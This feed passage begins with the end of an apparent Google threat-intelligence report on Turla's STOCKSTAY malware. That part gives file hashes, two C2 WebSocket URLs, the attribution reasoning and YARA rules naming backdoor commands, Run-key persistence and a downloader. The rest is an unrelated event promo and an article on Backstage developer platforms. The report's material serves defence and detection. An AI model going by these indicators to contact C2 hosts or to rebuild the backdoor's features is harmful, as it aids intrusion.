</tr>
<tr>
<td>
<p><code>MSDriver.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler</span></p>
</td>
<td>
<p><code>c905cb512018cc55512c6a22677c3d6f389c47afd54d7c85797868fc4fcb90e9</code></p>
</td>
</tr>
<tr>
<td>
<p><code>MSRender.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKTRADER backdoor</span></p>
</td>
<td>
<p><code>667a8f568a611f2f3d84a366b7946b360e055bece9699c95aad619637ab72a38</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ms-lib-math-core.dll</code></p>
</td>
<td>
<p><span>Module containing core crypt and obfuscation routines, historically found within core STOCKSTAY components</span></p>
</td>
<td>
<p><code>b287347a5bff8af360ce0e6500c336b6fe6d97920abc26202c9d843ffebc5f89</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ms-api-win-render.dll</code></p>
</td>
<td>
<p><span>Module containing backdoor command handlers, historically found within STOCKSTAY.STOCKTRADER</span></p>
</td>
<td>
<p><code>1682e8d82016b3f10434d2ebac995fd3b6aa812f079bfd7888652e94a994d851</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ms-api-wmcpdt.dll</code></p>
</td>
<td>
<p><span>Module containing STOCKSTAY’s IPC logic, historically found within each STOCKSTAY component</span></p>
</td>
<td>
<p><code>e2a0f4440f67998a0215d49be31746ea192bfcb4dc4ee532a218f8cf13605714</code></p>
</td>
</tr>
<tr>
<td>
<p><code>MSViewer.lnk</code></p>
</td>
<td>
<p><span>LNK shortcut intended to execute STOCKSTAY.STOCKMARKET</span></p>
</td>
<td>
<p><code>3627f582420ad2782d452fe6d13fae42658d1484296351d3916703e25dcadd14</code></p>
</td>
</tr>
<tr>
<td>
<p><code>MSRender.lnk</code></p>
</td>
<td>
<p><span>LNK shortcut intended to execute STOCKSTAY.STOCKTRADER</span></p>
</td>
<td>
<p><code>77417df21b4b4e8d86b8bda4afeef93fd36f355362586b2d1f51121a82244167</code></p>
</td>
</tr>
<tr>
<td>
<p><code>MSDriver.lnk</code></p>
</td>
<td>
<p><span>LNK shortcut intended to execute STOCKSTAY.STOCKBROKER</span></p>
</td>
<td>
<p><code>813c78b5b6ef28a9c0ed35f2c6cd88fc50880ab91f8777dfe7aaccb1c24b08d5</code></p>
</td>
</tr>
<tr>
<td>
<p><code>fonts</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>e83f274bf9914c6cfc0c6b3cdadf089565f49dace4aca93287c22aba9641c8f3</code></p>
</td>
</tr>
<tr>
<td>
<p><code>fonts</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>f964353b9ae4bedbe62de6c0d7eafa9fb8b87897bbaea483aedaa8ae191834da</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span>Table 22: File indicators</span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://driverx86-adobe.onrender.com/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://google-ai-labs-it.onrender.com/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 23: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h3><span>Attribution</span></h3>
<p><span>GTIG attributes the STOCKSTAY ecosystem and related activity to threat clusters assessed with high confidence links to Turla, based on the following:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>STOCKSTAY uses Windows-1251 during command-processing - an encoding notably designed specifically to support Cyrillic script. This is indicative of a development or operational environment linked to Eastern Europe, the Balkans, or Central Asia. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>STOCKSTAY has code overlaps with KAZUAR, a widely-attributed proprietary Turla toolkit, based on the recent introduction of K1MORPHER string obfuscation into both malware families within a similar time window.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>GTIG observed STOCKSTAY being delivered from compromised infrastructure which was also identified as hosting part of Turla’s victim-facing KAZUAR C2 infrastructure.</span></p>
</li>
</ul>
<p><span>Turla has a consistent focus on targeting Ukrainian Defense and Military organizations, and was identified within a Mandiant Incident Response deploying STOCKSTAY alongside a range of other proprietary Turla malware, such as WILDDAY, DIAMONDBACK, and KAZUAR.</span></p>
<h3><span>Detections</span></h3>
<h4><span>Google Security Operations (SecOps)</span></h4>
<p><span>SecOps customers will have access to the following pending-deployment rules. Once fully deployed, these rules will be available under the Mandiant Frontline Threats, Mandiant Hunting and Mandiant Intel Emerging Threats rule packs:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Archiver Extraction To Windows Startup</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Registry Write Registry Run Keys</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Registry Write to Run Registry Key</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Potential RDP File Write From Phishing</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>RDP Connection Initiated from Staging Directory</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Onrender Subdomain Suspicious DNS Query</span></p>
</li>
</ul>
<h4><span>YARA Rules</span></h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_STOCKSTAY_ConfigurationFile_2 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects encrypted configuration files associated with STOCKSTAY."
        hash = "40a3b969d81ef1ef35dd9ebcc6774e060b1b8949d3d74f38ca6b7d789c95cdb3"

    strings:
        $s1 = "\"SystemConfiguration\""
        $s2 = "An application for getting information about current events on trading platforms"
        $s3 = "To set the time for updating information, enter a value in minutes in the `Interval` field"
        $s4 = "The `SystemConfiguration` field stores the system settings of the application."
        $s5 = "In the `services` field, fill in the list of addresses of services that provide the `WebSocket protocol`."
        $s6 = "wss://"

    condition:
        uint16(0) == 0x227B  // {"
        and 4 of ($s*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_STOCKSTAY_ConfigurationFile_3 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects early configuration files associated with STOCKSTAY."
        hash = "1a2ca8b8e0344fe3d80da7352206a470245443e2349a237bc093df934ddc011f"

    strings:
        $key_required_1 = "\"List 1\""
        $key_required_2 = "\"List 2\""
        $key_required_3 = "\"List 3\""
        $key_dummy_1 = "\"BinanceApi\""
        $key_dummy_2 = "\"CoinbaseCloudApi\""
        $key_dummy_3 = "\"CoinbaseCloudApi Sandbox\""
        $key_dummy_4 = "\"ByBitApi Spot\""
        $key_dummy_5 = "\"ByBitApi Linear\""
        $key_dummy_6 = "\"Info level\""
        $key_dummy_7 = "\"Rate info\""
        $key_dummy_8 = "\"Info level\""

    condition:
        uint8(0) == 0x7B  // {
        and filesize &gt; 500
        and all of ($key_required_*)
        and 3 of ($key_dummy*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_STOCKSTAY_ConfigurationFile_5 {
  meta:
    author = "Google Threat Intelligence Group"
    description = "Detects plaintext configuration files used by the STOCKSTAY malware family."
    hash = "6cee9e838792ac5e2098362d68ce93a9a2c095d476dc16b289fe8509c99b2b8b"

  strings:
    $internal_id_1 = "\"internal_id\""
    $internal_id_2 = "\"i_id\""
    $internal_key_1 = "\"internal_key\""
    $internal_key_2 = "\"i_k\""
    $interval_engine_1 = "\"interval_engine\""
    $interval_engine_2 = "\"ie\""
    $level_info_1 = "\"level_info\""
    $level_info_2 = "\"li\""
    $time_scale_1 = "\"time_scale\""
    $time_scale_2 = "\"ts\""
    $span_min_1 = "\"span_min\""
    $span_min_2 = "\"mx1\""
    $span_max_1 = "\"span_max\""
    $span_max_2 = "\"my1\""
    $rate_1 = "\"rate\""
    $rate_2 = "\"rt_x_y\""
    $rate_control_1 = "\"rate_control\""
    $service_1 = "\"service\""
    $service_2 = "\"srv\""
    $days_not_work_1 = "\"days_not_work\""
    $days_not_work_2 = "\"dnw\""
    $system_properties_1 = "\"system_properties\""
    $system_properties_2 = "\"sp\""

  condition:
    any of ($internal_id*)
    and any of ($internal_key*)
    and any of ($interval_engine*)
    and any of ($level_info*)
    and any of ($time_scale*)
    and any of ($span_min*)
    and any of ($span_max*)
    and any of ($rate*)
    and any of ($service*)
    and any of ($days_not_work*)
    and any of ($system_properties*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_STOCKSTAY_CryptoContainer_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects code for parsing crypto containers within STOCKSTAY components."
        hash = "82707cfdf24dcb762f4615f01e1ba4d3dfdec4abe9cd588558d2634d7e6a5eeb"

    strings:
        $s1 = "BuildCryptoContainer"
        $s2 = "ParseCryptoContainer"
        $s3 = "Windows-1251" wide
        $s4 = "AesCryptoServiceProvider"
        $s5 = "RSACryptoServiceProvider"

    condition:
        uint16(0) == 0x5a4d
        and all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_STOCKSTAY_WindowNames_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY window names."
        hash = "dfd5cb91d06b9649d4cab500343af80ad1144a9e46641cc406f43dd169003c22"


    strings:
        $import = "_CorExeMain"
        $s2 = "SMEditorPage" wide
        $s3 = "SMNetPage" wide
        $s4 = "StockMarketViewPage" wide
        $s5 = "window_system32_x128" wide
        $s6 = "window_system32_x64" wide
        $s7 = "window_system32_x32" wide

    condition:
        $import 
        and any of ($s*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Downloader_STOCKSTAY_MARKETMAKER_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY.MARKETMAKER downloader based on method names and payload filenames."
        hash = "da8a96bc74e265f945f1cc6992c6dc0f9ea36ed1991f7b8d312db79d9bf78c40"

    strings:
        $f1 = "CheckAutoRun"
        $f2 = "SetupAutoRun"
        $f3 = "DownloadAndExtractZip"
        $f4 = "GetSystemProxy"

        $s0 = "_CorExeMain"
        $s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide
        $s2 = "StockMarketView.exe" wide
        $s3 = "SMNet.exe" wide
        $s4 = "SMEditor.exe" wide

    condition:
        all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Controller_STOCKSTAY_STOCKMARKET_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY.STOCKMARKET controller based on method and field names, and SQL queries"
        hash = "2af7b513c05e76d7da5f75bb0a223c894a706c99ef2c2ddfe4eae542f95a08e0"

    strings:
        $f1 = "ProtocolMessageConnect"
        $f2 = "ProtocolMessageEnd"
        $f3 = "ProtocolMessagePing"
        $f4 = "ProtocolMessageRequestRecv"
        $f5 = "ProtocolMessageRequestSend"
        $f6 = "ProtocolMessageTask"
        $f7 = "ProtocolMessageTaskSysinfo"
        $f8 = "TMR_AppInit_Tick"
        $f9 = "TMR_Engine_Tick"
        $f10 = "TMR_KeepAlive_Tick"
        $f11 = "TMR_PingNet_Tick"
        $f12 = "TMR_PingSystem_Tick"
        $f13 = "GetDataTrade"
        $f14 = "GetDataNews"
        $f15 = "InsertDataTrade"
        $f16 = "InsertDataNews"
        $sql1 = "CREATE TABLE IF NOT EXISTS News (" wide
        $sql2 = "CREATE TABLE IF NOT EXISTS Trade (" wide
        $sql3 = "CREATE TABLE IF NOT EXISTS Market (" wide
        $sql4 = "INSERT INTO Market ( Guid, Version, Config, Status, Launch, Type ) VALUES (@Guid, @Version, @Config, @Status, @Launch, @Type)" wide
        $sql5 = "INSERT INTO News (Container) VALUES (@Container)" wide
        $sql6 = "INSERT INTO Trade (Container) VALUES (@Container)" wide

    condition:
        8 of ($f*)
        and any of ($sql*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Tunneler_STOCKSTAY_STOCKBROKER_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY.STOCKBROKER tunneler based on known IPC message handler and variable names."
        hash = "dfd5cb91d06b9649d4cab500343af80ad1144a9e46641cc406f43dd169003c22"

    strings:
        $s1 = "_CorExeMain"
        $s2 = "ProtocolMessageStatusConnection"
        $s3 = "ProtocolMessageResult"
        $s4 = "ProtocolMessageEnd"
        $s5 = "OnGetDataFromServer"
        $s6 = "webSocket"
        $s7 = "wmCopyData"
        $s8 = "tempStorage"

    condition:
        all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_STOCKSTAY_STOCKTRADER_3 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY.STOCKTRADER backdoor based on known command handlers and FNV1a hashes."
        hash = "82707cfdf24dcb762f4615f01e1ba4d3dfdec4abe9cd588558d2634d7e6a5eeb"

    strings:
        $cmd_1 = "AppDel"
        $cmd_3 = "AppDeleteRegistryValue"
        $cmd_4 = "AppDir"
        $cmd_5 = "AppGet"
        $cmd_6 = "AppMkdir"
        $cmd_7 = "AppPut"
        $cmd_8 = "AppReadRegistryValue"
        $cmd_9 = "AppRegistryKeyExists"
        $cmd_10 = "AppRmdir"
        $cmd_11 = "AppRun"
        $cmd_12 = "AppWriteRegistryValue"
        $cmd_13 = "AppUnpackArchive"
        $cmd_14 = "ArchiveFiles"
        $cmd_15 = "GetFiles"
        $cmd_16 = "Sysinfo"
        
        $hash_1  = {ea8e5e34}
        $hash_2  = {3445694e}
        $hash_3  = {f73e97b6}
        $hash_4  = {9aa70c59}
        $hash_5  = {18b496c9}
        $hash_6  = {0f716ebc}
        $hash_7  = {8e2d79ce}
        $hash_8  = {3ae2a963}
        $hash_9  = {35d26840}
        $hash_10 = {6c41d6bc}
        $hash_11 = {1fdbbb2f}
        $hash_12 = {6ae6578d}
        $hash_13 = {66732be7}
        $hash_14 = {0b113b3d}

    condition:
        uint16(0) == 0x5a4d
        and (
            12 of ($cmd*)
            or 10 of ($hash*)
        )
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Hunting_K1MORPHER_1 {
  meta:
    author = "Google Threat Intelligence Group"
    description = "Detects plaintext class and method names associated with the .NET class K1.Morpher"
    hash = "45bb8d1ab2c13bf4354294e13d3c9be15de625d807301905b98462f43f93e893"

  strings:
    $plain_api_1 = "Squirrel3"
    $plain_api_2 = "DecryptArraySimple"
    $plain_api_3 = "DecryptIntSimple"
    $plain_api_4 = "DecryptLongSimple"
    $plain_api_5 = "DecryptFloatSimple"
    $plain_api_6 = "DecryptStringSimple"
    $plain_api_7 = "DecryptDoubleSimple"
    $plain_api_8 = "_squ_ui1"
    $plain_api_9 = "_squ_ui2"
    $plain_api_10 = "_squ_ui3"
    $plain_api_11 = "InjectedSeedCipher"

  condition:
    dotnet.is_dotnet
    and 5 of ($plain_api*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Hunting_K1MORPHER_2 {
  meta:
    author = "Google Threat Intelligence Group"
    description = "Detects the Squirrel3 RNG implemented within K1.Morpher"
    hash = "45bb8d1ab2c13bf4354294e13d3c9be15de625d807301905b98462f43f93e893"

  strings:
    $squirrel3_code_1 = {
      00 // nop
      03 // ldarg.1
      0A // stloc.0
      06 // ldloc.0
      7E ??????04 // ldsfld &lt;token&gt;
      5A // mul
      0A // stloc.0
      06 // ldloc.0
      02 // ldarg.0
      58 // add
      0A // stloc.0
      06 // ldloc.0
      06 // ldloc.0
      1E // ldc.i4.8
      64 // shr.un
      61 // xor
      0A // stloc.0
      06 // ldloc.0
      7E ??????04 // ldsfld &lt;token&gt;
      58 // add
      0A // stloc.0
      06 // ldloc.0
      06 // ldloc.0
      1E // ldc.i4.8
      62 // shl
      61 // xor
      0A // stloc.0
      06 // ldloc.9
      7E ??????04 // ldsfld &lt;token&gt;
      5A // mul
      0A // stloc.0
      06 // ldloc.0
      06 // ldloc.0
      1E // ldc.i4.8
      64 // shr.un
      61 // xor
      0A // stloc.0
      06 // ldloc.0
      0B // stloc.1
      2B 00 // br.s 40
      07 // ldloc.1
      2A // ret
    }

  condition:
    dotnet.is_dotnet
    and all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Hunting_K1MORPHER_3 {
  meta:
    author = "Google Threat Intelligence Group"
    description = "Detects the Squirrel3 RNG implemented within K1.Morpher"
    hash = "391e51354118fb87dc57650cbbd94258c3f7c0a0d6868040b7a473ad626ff25e"

  strings:
    $squirrel3_code_1 = {
      03 // ldarg.1
      7E??????04 // ldsfld &lt;token&gt;
      5A // mul
      02 // ldarg.0
      58 // add
      25 // dup
      1E // ldc.i4.8
      64 // shr.un
      61 // xor
      7E??????04 // ldsfld &lt;token&gt;
      58 // add
      25 // dup
      1E // ldc.i4.8
      62 // shl
      61 // xor
      7E??????04 // ldsfld &lt;token&gt;
      5A // mul
      25 // dup
      1E // ldc.i4.8
      64 // shr.un
      61 // xor
      2A // ret
    }

  condition:
    dotnet.is_dotnet
    and all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h3><span>Acknowledgements</span></h3>
<p><span>This analysis would not have been possible without the assistance of Gabby Roncone for technical review. We also appreciate GitHub for their collaboration against this threat. </span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[2 days left to save up to $190: Join 1,000+ founders and investors at TechCrunch Founder Summit]]></title>
<description><![CDATA[2 days left to lock in your spot at TechCrunch Founder Summit 2026 and save up to $190 before Early Bird rates expire on June 26 at 11:59 p.m. PT. Register here.]]></description>
<link>https://tsecurity.de/de/3624791/it-nachrichten/2-days-left-to-save-up-to-190-join-1000-founders-and-investors-at-techcrunch-founder-summit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624791/it-nachrichten/2-days-left-to-save-up-to-190-join-1000-founders-and-investors-at-techcrunch-founder-summit/</guid>
<pubDate>Thu, 25 Jun 2026 16:02:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[2 days left to lock in your spot at TechCrunch Founder Summit 2026 and save up to $190 before Early Bird rates expire on June 26 at 11:59 p.m. PT. Register here.]]></content:encoded>
</item>
<item>
<title><![CDATA[Building a state-of-the-art development platform with Backstage]]></title>
<description><![CDATA[Key takeaways




Backstage solved the portal problem, not the platform problem. A portal organizes catalogs, documentation, and templates. A platform owns deployments, environments, policies, and runtime operations. Backstage assumes that the execution layer exists beneath it.



Point-to-point ...]]></description>
<link>https://tsecurity.de/de/3623951/ai-nachrichten/building-a-state-of-the-art-development-platform-with-backstage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623951/ai-nachrichten/building-a-state-of-the-art-development-platform-with-backstage/</guid>
<pubDate>Thu, 25 Jun 2026 11:34:09 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<h2 class="wp-block-heading">Key takeaways</h2>



<ul class="wp-block-list">
<li>Backstage solved the portal problem, not the platform problem. A portal organizes catalogs, documentation, and templates. A platform owns deployments, environments, policies, and runtime operations. Backstage assumes that the execution layer exists beneath it.</li>



<li>Point-to-point integrations become a maintenance burden. Many organizations end up with a “messy middle” where Backstage is connected directly to <a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">CI/CD</a>, <a href="https://www.infoworld.com/article/2259088/what-is-gitops-extending-devops-to-kubernetes-and-beyond.html" data-type="link" data-id="https://www.infoworld.com/article/2259088/what-is-gitops-extending-devops-to-kubernetes-and-beyond.html">GitOps</a>, <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html" data-type="link" data-id="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html">Kubernetes</a>, and <a href="https://www.infoworld.com/article/2262666/what-is-observability-software-monitoring-on-steroids.html" data-type="link" data-id="https://www.infoworld.com/article/2262666/what-is-observability-software-monitoring-on-steroids.html">observability</a> tools through custom wiring that’s fragile and hard to evolve.</li>



<li>Abstractions are the interface between developers and infrastructure. Developers work with components, endpoints, and dependencies. Platform engineers work with environments, pipelines, and component types. The platform compiles both into Kubernetes resources.</li>



<li>A control plane bridges the gap. It sits between the portal and runtime, compiling abstractions into infrastructure, enforcing policies consistently, reconciling drift, and aggregating runtime state back to the portal.</li>



<li>Good abstractions enable advanced capabilities. Unified observability, automated guardrails, and AI agents that can reason about and act on your platform. All becomes possible when you have well-defined concepts and a control plane that understands both sides.</li>
</ul>



<p>…</p>



<h2 class="wp-block-heading">Start with Backstage</h2>



<p>If you’re building an <a href="https://www.infoworld.com/article/2263059/what-is-an-internal-developer-platform-paas-done-your-way.html" data-type="link" data-id="https://www.infoworld.com/article/2263059/what-is-an-internal-developer-platform-paas-done-your-way.html">internal developer platform</a>, Backstage is certainly part of your architecture. It solved the discovery problem and became the default choice for developer portals.</p>



<p>Before Backstage, developers navigated wikis, spreadsheets, and tribal knowledge just to find who owned a service or how to spin up a new one. Backstage brought structure: a unified catalog, a plugin ecosystem, and golden-path templates that actually got adopted.</p>



<p><a href="https://github.com/backstage/backstage" data-type="link" data-id="https://github.com/backstage/backstage">Backstage</a> is a Cloud Native Computing Foundation (CNCF) project with one of the most active contributor communities in the ecosystem. When organizations evaluate developer portals, Backstage is the starting point.</p>



<p>However, many teams discover something after deployment: Backstage provides a portal, not a platform. A portal organizes information. A platform owns execution: deployments, environments, policies, observability, and runtime operations.</p>



<p>Backstage assumes that the execution layer exists beneath it. That layer is where most of the complexity lives, and it’s what this article is about.</p>



<h2 class="wp-block-heading"><a></a>What a developer platform actually is</h2>



<p>A developer platform or an internal developer platform is a self-service framework you build to help developers build, deploy, and manage applications independently.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/Image_01_developer_platform.png" alt="Image_01_developer_platform" class="wp-image-4189088" width="1024" height="307" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">WSO2</p></div>



<p>Most organizations already have an organically grown version of this:</p>



<ul class="wp-block-list">
<li>Developer commits code</li>



<li>CI pipeline builds and pushes images to a registry</li>



<li>Pipeline updates a GitOps repo containing Helm charts or Kubernetes manifests</li>



<li>Argo CD or Flux syncs those manifests to clusters</li>
</ul>



<p>You may have this workflow running today. The question is whether it’s a pipeline stitched together with scripts and tribal knowledge, or a platform with consistent abstractions and self-service capabilities.</p>



<h2 class="wp-block-heading"><a></a>What usually happens after adopting Backstage</h2>



<p>How do you add Backstage to this setup? The common approach is for developers to maintain Backstage entity files (primarily component and API entities) alongside the source code. Then you configure the built-in entity provider in Backstage to scan source code repositories to populate the catalog. Eventually, you’ll end up with a portal with all your systems, components, APIs, and other resources. So far, so good.</p>



<p>Once developers start using the portal, you’ll be hit with a consistent flow of feature requests:</p>



<ul class="wp-block-list">
<li>“I see my component in the catalog, but is it actually running?” You configure the Kubernetes plugin and link components to their corresponding manifests. Now developers can see pod status, deployment state, and replica counts.</li>



<li>“I need logs, metrics, and traces related to my component.” You integrate your observability stack or developers context-switch to Grafana, Datadog, or whatever you’re running. Either way, more wiring.</li>



<li>“Can I create new components from here?” You build Backstage templates that scaffold repos with the right structure, Backstage entities, Helm charts, and CI pipelines, all of which encode your organization’s best practices. Now you’re maintaining golden paths in templates, separately from the runtime configuration that actually enforces them.</li>
</ul>



<p>Each request is reasonable and achievable, but they add up.</p>



<h2 class="wp-block-heading"><a></a>The messy middle</h2>



<p>Eventually, you end up with a platform held together by point-to-point connections. Every new capability requires new wiring. Every upgrade risks breaking something. You spend more time maintaining integrations than building features.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/Image_02_messy_middle.png" alt="Image_02_messy_middle" class="wp-image-4189092" width="1024" height="893" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">WSO2</p></div>



<p>You would never design a production system with this many point-to-point dependencies. Why accept it for your platform?</p>



<h2 class="wp-block-heading"><a></a>Treat the platform as a product, but also as a system</h2>



<p>Organically grown systems get you started, but once you commit to Backstage as your portal, you need a product mindset. Start from developer experience, understand their pain points, then design a system that addresses them coherently.</p>



<p>A platform is also a system. Approach it the way you would approach any production system you’re building. You wouldn’t design a back-end service without thinking about separation of concerns, clear interfaces, and extensibility.</p>



<p>The same principles apply here:</p>



<ul class="wp-block-list">
<li>Separation of concerns: Don’t mix developer-facing abstractions with infrastructure implementation. Keep them separate so you can evolve each independently.</li>



<li>Clear interfaces: Define explicit abstractions. Developers and platform engineers should interact with well-defined concepts rather than implementation details scattered across Helm charts and CI scripts.</li>



<li>Extensibility: Requirements keep changing. If every new capability requires custom wiring, you’ll spend more time maintaining than improving. Design for extension from the start.</li>
</ul>



<p>The difference between a pile of integrations and a platform is architecture. Get the system design right, and new capabilities slot in cleanly. Get it wrong, and every feature request becomes a maintenance burden.</p>



<h2 class="wp-block-heading">The missing layer beneath Backstage</h2>



<p>Moving from an organically grown pipeline to an actionable developer platform is a big leap. You probably have CI/CD pipelines that work, a Kubernetes cluster running workloads, and a Backstage catalog describing what exists.</p>



<p>The questions are:</p>



<ul class="wp-block-list">
<li>How do you transform an informational portal into one with a platform under the hood?</li>



<li>How do you bridge the gap between what the catalog describes and what’s actually running?</li>



<li>How do you enforce golden paths beyond initial scaffolding?</li>



<li>How do you design a platform that evolves with your organization’s needs?</li>
</ul>



<p>What’s missing is a connective layer between Backstage and your runtime, something that makes the portal operational rather than just informational. Let’s look at the key architectural elements to consider when designing that layer and the whole platform.</p>



<h2 class="wp-block-heading"><a></a>Start with abstractions</h2>



<p>One of the main goals of a developer platform is to reduce cognitive load. The platform should meet developers where they are and speak their language, not Kubernetes’.</p>



<p>Every organization has its own vocabulary, but the Backstage system model is a good starting point. It may not cover everything, but you can extend it with custom entities. The key is that developers work with high-level concepts while the platform compiles them into Kubernetes resources. Developers are abstracted away from the underlying details, but they can still see what’s happening underneath.</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td><strong>Concept</strong></td><td><strong>Description</strong></td><td><strong>Backstage mapping</strong></td></tr><tr><td>Project</td><td>A cloud-native application composed of multiple components. It is also a unit of isolation.</td><td>System</td></tr><tr><td>Component</td><td>A deployable unit, such as web services, APIs, workers, or scheduled tasks.</td><td>Component</td></tr><tr><td>Endpoint</td><td>A network-accessible interface exposed by a component. </td><td>API</td></tr><tr><td>Resource</td><td>External infrastructure such as databases, queues, and caches.</td><td>Resource</td></tr><tr><td>Dependency</td><td>A component’s reliance on endpoints or resources.</td><td>consumesAPI, dependsOn</td></tr></tbody></table> </div></figure>



<p>These are not just static abstractions; they also have associated runtime semantics. The following diagram illustrates runtime representations of these concepts.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/Image_03_cell_diagram.png" alt="Image_03_cell_diagram" class="wp-image-4189100" width="1024" height="905" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">WSO2</p></div>



<p>In the workload cluster, a project becomes an isolation boundary for all of its components. The platform translates this into Kubernetes namespaces and network policies that enforce the boundary, not just document it.</p>



<p>Endpoint visibility determines which endpoints can talk to which. A project-scoped endpoint gets network policies that block traffic from outside the project. An organization-scoped endpoint is exposed to internal traffic but remains behind the internal gateway. An external endpoint gets routed through the public gateway with appropriate authentication. Developers declare visibility; the platform generates the policies.</p>



<p>Dependencies work the same way. When a component declares a dependency on an endpoint, the platform injects the URL and other environment variables required to connect to the dependency. It configures the network policies for both directions, egress from the calling endpoint and ingress to the target endpoint. Without the declared dependency, egress is blocked by default. The dependency graph you see above reflects actual permitted traffic flow, not just intended relationships.</p>



<h2 class="wp-block-heading"><a></a>You need platform abstractions, too</h2>



<p>Developer abstractions help your developers. Platform abstractions help you.</p>



<p>While developers work with components, endpoints, and dependencies, you need a different vocabulary to design and operate the platform itself. These abstractions let you and your team define standards, enforce policies, and create structure without writing low-level configurations for every scenario.</p>



